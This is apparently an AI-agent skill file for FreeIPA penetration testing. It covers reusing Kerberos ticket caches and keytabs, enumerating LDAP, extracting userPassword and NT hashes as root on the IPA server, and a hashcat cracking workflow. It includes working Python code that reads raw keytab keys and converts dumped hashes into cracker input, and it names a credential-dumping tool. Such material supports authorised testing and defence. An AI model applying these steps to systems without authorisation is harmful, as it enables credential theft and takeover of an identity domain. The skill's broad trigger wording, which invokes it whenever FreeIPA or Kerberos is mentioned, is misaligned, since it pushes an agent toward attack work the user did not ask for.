Hacktricks-skills freeipa-pentesting

FreeIPA penetration testing and enumeration. Use this skill whenever the user mentions FreeIPA, Kerberos on Unix, LDAP enumeration, IPA domain attacks, or any Active Directory-like infrastructure on Linux/Unix systems. This skill covers authentication, enumeration, hash extraction, and privilege escalation techniques for FreeIPA environments.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/linux-hardening/freeipa-pentesting/SKILL.MD
source content

FreeIPA Pentesting

FreeIPA is an open-source identity-management system for Linux/Unix environments that plays the role Active Directory plays on Windows. It combines a 389 Directory Server LDAP directory with an MIT Kerberos KDC (plus an integrated CA, optional DNS and the SSSD client) so that users, hosts, groups and access rules are managed centrally, much like an AD domain.

When to Use This Skill

Use this skill when:

  • You need to enumerate or attack a FreeIPA domain
  • You're working with Kerberos authentication on Linux/Unix
  • You need to extract or crack FreeIPA password hashes
  • You're investigating HBAC rules, sudo rules, or role-based access control in FreeIPA
  • You're doing privilege escalation in a FreeIPA environment

Quick Reference

Key Files

  • /etc/krb5.conf
    - Kerberos client configuration
  • /etc/ipa/default.conf
    - IPA client/server defaults
  • /etc/krb5.keytab
    - Kerberos keytab for authentication

Key Binaries

  • ipa - FreeIPA management tool
  • kinit, klist, kdestroy - Kerberos ticket management
  • kpasswd, ksu, kswitch, kvno - Additional Kerberos utilities

Environment Variables

  • KRB5CCNAME
    - Points to CCACHE ticket file
  • KRB5_KTNAME
    - Points to keytab file
  • KRB5_CONFIG
    - Custom krb5.conf location

Authentication

CCACHE Tickets

CCACHE files store Kerberos credentials (the TGT, any service tickets and their session keys) in binary format, typically as /tmp/krb5cc_<uid> with 600 permissions. Anyone who can read the file can use the tickets, so as root look for other users' caches in /tmp. On IPA clients running SSSD the default cache is usually the kernel keyring instead (see the next section).

# Parse a CCACHE ticket (klist reads the cache named in KRB5CCNAME; -e also shows the enctypes)
klist

# Re-use a CCACHE ticket
export KRB5CCNAME=/path/to/ticket.ccache

Unix Keyring

Tickets can also be stored in the Linux keyring with various scopes:

  • KEYRING:name
  • KEYRING:process:name
  • KEYRING:thread:name
  • KEYRING:session:name
  • KEYRING:persistent:uidnumber

Use Tickey to extract tickets from the keyring.

Keytab Files

Keytab files contain Kerberos principals and their long-term keys in clear (the keys derived from the account password, not encrypted copies of it), so possession of a keytab gives a TGT for every principal in it without knowing a password. /etc/krb5.keytab is readable only by root and normally holds the host principal host/<fqdn>@<REALM>; a TGT obtained with it yields whatever the LDAP ACIs and HBAC rules grant to that host.

# Parse keytab (-t adds timestamps, -K prints the raw key bytes)
klist -kKt /etc/krb5.keytab

# Use keytab for authentication
kinit -kt /etc/krb5.keytab <principal>@<REALM>
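The keytab layout that klist -kKt is printing is simple enough to parse by hand, which is useful when a keytab has been copied off a host that has no Kerberos tooling. The following is an added example, not code from the hacktricks-skills repo or from MIT Kerberos: it parses the MIT keytab format (version 0x0502, all fields big-endian, each entry prefixed by its size) and builds its own sample keytab in memory, so the principal names, realm, kvno, timestamp and key bytes are constructed assumptions rather than material from a real FreeIPA host.

```python
"""Parse an MIT Kerberos keytab (file format 0x0502) without klist.

Added example for the keytab section; not code from the hacktricks-skills repo
or from MIT Kerberos. The keytab is built in memory by build_keytab(), so the
principal, realm, kvno, timestamp and key bytes below are constructed,
illustrative values, not material taken from a real FreeIPA host.
"""
import struct
import time

ENCTYPES = {  # RFC 3961/3962/8009 enctype numbers commonly seen in FreeIPA keytabs
    17: "aes128-cts-hmac-sha1-96",
    18: "aes256-cts-hmac-sha1-96",
    19: "aes128-cts-hmac-sha256-128",
    20: "aes256-cts-hmac-sha384-192",
    23: "arcfour-hmac",
}
KRB5_NT_PRINCIPAL = 1        # name_type used for user and host/service principals
FIXED_TIME = 1700000000      # constructed entry timestamp (2023-11-14 UTC)


def _counted(buf, off):
    """Read a counted_octet_string: uint16 length followed by that many bytes."""
    (n,) = struct.unpack_from(">H", buf, off)
    return buf[off + 2:off + 2 + n], off + 2 + n


def parse_keytab(data):
    """Return one dict per live entry, in file order (the fields klist -kKt shows)."""
    if data[:2] != b"\x05\x02":
        raise ValueError("unsupported keytab version %r" % data[:2])
    off, entries = 2, []
    while off + 4 <= len(data):
        (size,) = struct.unpack_from(">i", data, off)   # entry size, excluding this field
        off += 4
        if size < 0:                                    # negative size = deleted slot; skip it
            off -= size
            continue
        end = off + size
        (ncomp,) = struct.unpack_from(">H", data, off)
        off += 2
        realm, off = _counted(data, off)                # realm precedes the name components
        comps = []
        for _ in range(ncomp):
            comp, off = _counted(data, off)
            comps.append(comp.decode())
        name_type, timestamp, vno8 = struct.unpack_from(">IIB", data, off)
        off += 9
        (enctype,) = struct.unpack_from(">H", data, off)
        off += 2
        key, off = _counted(data, off)                  # the long-term key itself, unencrypted
        vno = vno8
        if end - off >= 4:                              # a 32-bit kvno overrides vno8 when present
            (vno,) = struct.unpack_from(">I", data, off)
        off = end
        entries.append({
            "principal": "/".join(comps) + "@" + realm.decode(),
            "name_type": name_type,
            "timestamp": timestamp,
            "kvno": vno,
            "enctype": ENCTYPES.get(enctype, "enctype-%d" % enctype),
            "key": key.hex(),
        })
    return entries


def build_keytab(entries):
    """Serialize (principal, kvno, enctype, key) tuples into 0x0502 keytab bytes."""
    out = bytearray(b"\x05\x02")
    for principal, kvno, enctype, key in entries:
        name, realm = principal.rsplit("@", 1)
        comps = name.split("/")
        body = struct.pack(">H", len(comps))
        for s in [realm] + comps:
            body += struct.pack(">H", len(s)) + s.encode()
        body += struct.pack(">IIB", KRB5_NT_PRINCIPAL, FIXED_TIME, kvno & 0xFF)
        body += struct.pack(">HH", enctype, len(key)) + key
        body += struct.pack(">I", kvno)                  # full kvno, as modern kadmin writes it
        out += struct.pack(">i", len(body)) + body
    return bytes(out)


# Constructed sample: the shape of /etc/krb5.keytab on an IPA client (host principal
# with two AES keys) plus a service key with kvno > 255; key bytes are dummies.
HOST_PRINCIPAL = "host/ipa-client.domain.local@DOMAIN.LOCAL"
SAMPLE_KEYTAB = build_keytab([
    (HOST_PRINCIPAL, 2, 18, bytes(range(32))),
    (HOST_PRINCIPAL, 2, 17, bytes(range(16))),
    ("HTTP/ipa-server.domain.local@DOMAIN.LOCAL", 300, 18, bytes(32)),
])


def klist_lines(data):
    """Render entries roughly as klist -kKt does: kvno, timestamp, principal, key."""
    return ["%4d %s %s (0x%s) (%s)" % (
        e["kvno"], time.strftime("%Y-%m-%d", time.gmtime(e["timestamp"])),
        e["principal"], e["key"], e["enctype"]) for e in parse_keytab(data)]


if __name__ == "__main__":
    print("\n".join(klist_lines(SAMPLE_KEYTAB)))
```

Run it against a real file with `parse_keytab(open("/etc/krb5.keytab", "rb").read())`; the kvno and enctype of each entry tell you whether the key is current (kinit fails with a stale kvno after a key rotation) and which enctypes the KDC still accepts for that principal.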

Enumeration

Anonymous LDAP Enumeration

FreeIPA often allows anonymous binds, and much of the tree (users, groups, hosts and their attributes) is readable without authentication. Point ldapsearch at an IPA server and the domain base DN; without -H and -b it falls back to the system ldap.conf defaults, which are usually unset on a machine that is not a client.

# Enumerate all available data
ldapsearch -x -H ldap://ipa.domain.local -b "dc=domain,dc=local"

Authenticated Enumeration

With a valid Kerberos ticket (the cache named in KRB5CCNAME), SASL GSSAPI authenticates you to the directory and you can query specific containers. Users live under cn=users,cn=accounts; the cn=compat subtree is the schema-compatibility view that exposes the same users as plain posixAccount entries for legacy clients, so both bases are worth reading. Replace ipa.domain.local and dc=domain,dc=local with the target server and base DN.

# Get all users
ldapsearch -Y GSSAPI -H ldap://ipa.domain.local -b "cn=users,cn=accounts,dc=domain,dc=local"

# Get user groups
ldapsearch -Y GSSAPI -H ldap://ipa.domain.local -b "cn=groups,cn=accounts,dc=domain,dc=local"

# Get all hosts
ldapsearch -Y GSSAPI -H ldap://ipa.domain.local -b "cn=computers,cn=accounts,dc=domain,dc=local"

# Get host groups
ldapsearch -Y GSSAPI -H ldap://ipa.domain.local -b "cn=hostgroups,cn=accounts,dc=domain,dc=local"

Using IPA Binaries

From a domain-joined machine, use the ipa command for enumeration. It authenticates with Kerberos, so run kinit (or point KRB5CCNAME at a usable cache) first.

ipa user-find
ipa group-find
ipa host-find
ipa hostgroup-find

# Show detailed info
ipa user-show <username> --all
ipa group-show <group> --all
ipa host-show <host> --all
ipa hostgroup-show <group> --all

Note: the built-in admin user, and the admins group it belongs to, are the FreeIPA equivalent of Domain Admins in Active Directory; membership of admins is the first thing to look for in group output.

Hash Extraction

The root user on the IPA server can read the password hashes, which 389-ds stores in the userPassword attribute prefixed with the scheme name ({PBKDF2_SHA256}..., {SSHA512}...); in dbscan and LDIF output the whole value appears base64 encoded (attr:: value). Root on the server also reaches the directory as Directory Manager over the ldapi socket with SASL EXTERNAL, which is an alternative to reading the database files directly.

  • SSHA512 - Old FreeIPA versions
  • PBKDF2_SHA256 - New FreeIPA versions
  • ipaNTHash - AD integration (NT hash in base64); only present once ipa-adtrust-install has run and the user's password was changed afterwards

# Extract hashes using dbscan (389-ds database tool; requires root on IPA server)
dbscan -c /var/lib/ipa/...

Hash Cracking Workflow

  1. Decode the outer base64 (the LDIF :: encoding) from the attribute; the result is the scheme-tagged value, or the raw 16 bytes for ipaNTHash
  2. For NT hash (AD integration): re-encode the 16 decoded bytes as ASCII hex, then use John (--format=NT) or hashcat (-m 1000)
  3. For SSHA512: the value is base64(sha512(password + salt) + salt) behind the {SSHA512} tag; John/hashcat (mode 1711, "LDAP {SSHA512}") take the tagged string as-is
  4. For PBKDF2_SHA256: the inner base64 is a 4-byte iteration count, a 64-byte salt and a 256-byte derived key; hashcat -m 10900 takes sha256:<iterations>:<base64 salt>:<base64 of the first 256 bits (32 bytes) of the key>. Only the first PBKDF2 block is needed because each block is computed independently, so a guess that reproduces it is the password
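The conversion steps above are mechanical and easy to get subtly wrong (wrong base64 layer, wrong salt/key boundary), so here is an added example that automates them and lets you verify a candidate password offline before spending GPU time. It is not code from the hacktricks-skills repo or from FreeIPA/389-ds. The LDIF lines in SAMPLE_LDIF are constructed from the password "Password123" (and the well-known NT hash of "password"), so they are illustrative rather than values pulled from a server; the 389-ds storage layouts it assumes are {PBKDF2_SHA256} + base64(iterations(4 bytes big-endian) || salt(64) || derived key(256)), {SSHA512} + base64(sha512(password || salt) || salt) with an 8-byte salt, and ipaNTHash as the raw 16-byte NT hash. The iteration count used in the sample is illustrative too.

```python
"""Convert FreeIPA userPassword / ipaNTHash values into hashcat input and
verify guesses offline.

Added example for the hash extraction and cracking workflow; not code from the
hacktricks-skills repo or from FreeIPA/389-ds. SAMPLE_LDIF is constructed here
from the password "Password123" (and the well-known NT hash of "password").
Assumed 389-ds layouts:
  {PBKDF2_SHA256} + b64( iterations(4 bytes BE) || salt(64) || dk(256) )
  {SSHA512}       + b64( sha512(password || salt) || salt )   (8-byte salt)
  ipaNTHash       = raw 16-byte MD4(UTF-16LE(password))
"""
import base64
import hashlib
import struct

PBKDF2_TAG, SSHA512_TAG = b"{PBKDF2_SHA256}", b"{SSHA512}"


def _b64(b):
    return base64.b64encode(b).decode()


def ldif_value(line):
    """Split one LDIF line: 'attr:: x' is base64 (how dbscan/ldapsearch print
    binary values), 'attr: x' is literal text."""
    attr, _, rest = line.partition(":")
    if rest.startswith(":"):
        return attr, base64.b64decode(rest[1:].strip())
    return attr, rest.strip().encode()


def split_pbkdf2(raw):
    """Return (iterations, salt, derived_key) from a {PBKDF2_SHA256} value."""
    blob = base64.b64decode(raw[len(PBKDF2_TAG):])
    (iters,) = struct.unpack(">I", blob[:4])
    return iters, blob[4:68], blob[68:]


def to_hashcat(attr, raw):
    """Return (hashcat mode, hash line) for one decoded attribute value."""
    if attr == "ipaNTHash":                      # -m 1000: hex of the 16-byte NT hash
        return 1000, raw.hex()
    if raw.startswith(SSHA512_TAG):              # -m 1711 takes the LDAP form unchanged
        return 1711, raw.decode()
    if raw.startswith(PBKDF2_TAG):               # -m 10900: sha256:iter:b64salt:b64dk
        iters, salt, dk = split_pbkdf2(raw)
        # 389-ds stores a 256-byte derived key but hashcat checks only 256 bits.
        # PBKDF2 block 1 (the first 32 bytes) does not depend on later blocks,
        # so truncating loses nothing: a guess that matches block 1 is the password.
        return 10900, "sha256:%d:%s:%s" % (iters, _b64(salt), _b64(dk[:32]))
    raise ValueError("unrecognised scheme in %s" % attr)


def verify(raw, password):
    """Offline check of one candidate (what the cracker does for every guess)."""
    pw = password.encode()
    if raw.startswith(PBKDF2_TAG):
        iters, salt, dk = split_pbkdf2(raw)
        return hashlib.pbkdf2_hmac("sha256", pw, salt, iters, len(dk)) == dk
    if raw.startswith(SSHA512_TAG):
        blob = base64.b64decode(raw[len(SSHA512_TAG):])
        digest, salt = blob[:64], blob[64:]
        return hashlib.sha512(pw + salt).digest() == digest
    raise ValueError("no offline verifier for this scheme")


def first_block_matches(raw, password):
    """Confirm the truncated -m 10900 target equals PBKDF2 block 1 computed from scratch."""
    iters, salt, dk = split_pbkdf2(raw)
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iters, 32) == dk[:32]


# --- constructed sample data (NOT from a real server) ---------------------
SALT64 = hashlib.sha512(b"constructed-salt").digest()   # stand-in for a random 64-byte salt
SALT8 = b"\x01\x02\x03\x04\x05\x06\x07\x08"


def make_pbkdf2(password, iterations=8192, salt=SALT64):
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations, 256)
    return PBKDF2_TAG + base64.b64encode(struct.pack(">I", iterations) + salt + dk)


def make_ssha512(password, salt=SALT8):
    return SSHA512_TAG + base64.b64encode(hashlib.sha512(password.encode() + salt).digest() + salt)


SAMPLE_LDIF = [  # shaped like dbscan / ldapsearch output: base64 values after '::'
    "userPassword:: " + _b64(make_pbkdf2("Password123")),
    "userPassword:: " + _b64(make_ssha512("Password123")),
    "ipaNTHash:: " + _b64(bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")),
]


def convert_all(lines):
    """Map each LDIF line to (mode, hash line) ready for `hashcat -m <mode>`."""
    return [to_hashcat(*ldif_value(line)) for line in lines]


if __name__ == "__main__":
    for mode, line in convert_all(SAMPLE_LDIF):
        print("-m %d  %s" % (mode, line))
```

Feed the printed lines to hashcat with the mode shown; verify() is also handy for confirming a cracked result (or a password found elsewhere) against a dumped hash without touching the server.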

HBAC Rules

Host-Based Access Control (HBAC) rules decide which users or groups may log in to which hosts or host groups through which PAM services (sshd, sudo, login and so on); SSSD enforces them on each client. The default allow_all rule grants every user access to every host, so while it is still enabled HBAC restricts nothing. `ipa hbactest` evaluates a given user/host/service combination against the current rules.

# Enumerate HBAC rules
ldapsearch -Y gssapi -b "cn=hbac,dc=domain,dc=local"
ipa hbacrule-find
ipa hbacrule-show <rule> --all

Sudo Rules

Sudo rules define who may run which commands (or command groups) as which RunAs user on which hosts; SSSD fetches them from LDAP and hands them to sudo, so a rule granting ALL commands on a host you can reach is a direct path to root. The compat tree (ou=sudoers,dc=domain,dc=local) exposes the same rules in the sudoers-LDAP format used by older clients.

# Enumerate sudo rules
ldapsearch -Y gssapi -b "cn=sudorules,cn=sudo,dc=domain,dc=local"
ipa sudorule-find
ipa sudorule-show <rule> --all

Role-Based Access Control

Roles bundle privileges, which in turn bundle permissions (LDAP ACIs); roles can be assigned to users, groups, hosts, host groups and services. Built-in roles such as User Administrator let an account that is not in admins modify other users, so role membership is a privilege-escalation path to enumerate alongside admins membership.

# Enumerate roles, privileges, and permissions
ipa role-find
ipa role-show <role> --all
ipa privilege-find
ipa privilege-show <privilege> --all
ipa permission-find
ipa permission-show <permission> --all

Tools

Linikatz - mimikatz-style credential dumper for Unix hosts joined to a domain; collects keytabs, credential caches and other Kerberos material from the box for offline use

References